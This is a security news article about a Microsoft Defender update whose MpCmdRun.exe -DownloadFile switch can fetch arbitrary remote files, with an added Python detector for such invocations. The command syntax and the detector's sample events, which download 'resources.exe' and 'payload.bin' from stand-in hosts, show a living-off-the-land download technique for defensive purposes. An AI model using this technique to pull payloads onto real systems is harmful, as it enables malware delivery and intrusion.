Flaw in Microsoft Defender allows downloading any file, even a virus, from a remote server

Security flaws are sometimes introduced by the very products meant to prevent attacks. Cybersecurity specialists have detected a flaw in a Microsoft Defender update for Windows 10 that would allow malware and other malicious files to be downloaded onto the compromised system.

Exploiting this flaw would allow threat actors to stage follow-on attacks, mainly of the kind known as living-off-the-land, in which legitimate system tools are abused. Apparently the flaw lies in the MpCmdRun.exe command-line utility, which has been abused to download malicious files from remote locations. This is an issue that has affected many other applications on Windows systems.

The flaw was reported by computer security expert Mohammad Askar, who notes that the latest update to Microsoft Defender includes a new argument called -DownloadFile. This new feature allows local users to use the Microsoft Antimalware command-line utility to download files from remote locations with the following command:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

BleepingComputer experts performed multiple tests and found that the feature was added in version 4.18.2007.9 or 4.18.2009.9.
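From a detection standpoint, the useful signal is a process-creation event in which MpCmdRun.exe is launched with the -DownloadFile switch, especially when the parent is a shell or script host rather than the Defender service. The following is an added example written for this article, not code from BleepingComputer, Mohammad Askar or Microsoft; it assumes a constructed pipe-delimited event format (pid|parent_image|image|command_line) and constructed sample events, and flags each download invocation together with the URL and destination path taken from the command line.

```python
import ntpath
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of process-creation events (not real telemetry).
# Assumed field layout for this example: pid|parent_image|image|command_line
SAMPLE_EVENTS = r"""
4120|C:\Windows\explorer.exe|C:\Program Files\Windows Defender\MpCmdRun.exe|"MpCmdRun.exe" -Scan -ScanType 1
4188|C:\Windows\System32\cmd.exe|C:\Program Files\Windows Defender\MpCmdRun.exe|MpCmdRun.exe -DownloadFile -url http://example.invalid/resources.exe -path C:\Users\Public\resources.exe
4201|C:\Windows\System32\svchost.exe|C:\Program Files\Windows Defender\MpCmdRun.exe|MpCmdRun.exe -SignatureUpdate
4305|C:\Windows\explorer.exe|C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.9-0\MpCmdRun.exe|mpcmdrun.exe  -downloadfile  -url https://example.invalid/payload.bin -path "C:\Users\Public\My Files\p.bin"
"""

# Parents that indicate interactive or scripted abuse rather than the Defender service itself.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Finding:
    pid: int
    parent_image: str
    url: Optional[str]
    dest_path: Optional[str]
    severity: str


def split_command_line(cmdline: str) -> List[str]:
    """Tokenise a Windows command line: keep backslashes, honour double quotes."""
    return [t.strip('"') for t in shlex.split(cmdline, comments=False, posix=False)]


def detect_download(event_line: str) -> Optional[Finding]:
    """Return a Finding if the event is MpCmdRun.exe invoked with -DownloadFile, else None."""
    pid, parent_image, image, cmdline = event_line.split("|", 3)
    # Match on the image name, not the full path: the binary also lives under the Platform folder.
    if ntpath.basename(image).lower() != "mpcmdrun.exe":
        return None
    toks = split_command_line(cmdline)
    lowered = [t.lower() for t in toks]  # switches are case-insensitive
    if "-downloadfile" not in lowered:
        return None

    def value_after(flag: str) -> Optional[str]:
        try:
            return toks[lowered.index(flag) + 1]
        except (ValueError, IndexError):
            return None

    parent_name = ntpath.basename(parent_image).lower()
    severity = "high" if parent_name in SCRIPT_HOSTS else "medium"
    return Finding(int(pid), parent_image, value_after("-url"), value_after("-path"), severity)


def scan(log_text: str) -> List[Finding]:
    """Run the detector over every non-empty event line."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        finding = detect_download(line)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] pid={f.pid} parent={f.parent_image} url={f.url} -> {f.dest_path}")
```

The rule deliberately matches the switch case-insensitively and tokenises with Windows quoting rules, so a quoted destination path or extra whitespace does not hide the invocation; routine Defender activity such as -Scan or -SignatureUpdate is ignored. In production the same logic maps onto Sysmon Event ID 1 or Windows Security 4688 command-line fields.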


During testing, the experts managed to download a resources.exe file, a sample of the WastedLocker ransomware variant used in a recent cyberattack.


Fortunately it is not all bad news, as this flaw does not prevent Microsoft Defender from detecting malicious files downloaded by abusing MpCmdRun.exe, although it has not yet been checked whether the utility could be used to evade the restrictions of other antivirus solutions. At the moment Microsoft has not commented on the finding, although it will likely not be considered a security flaw.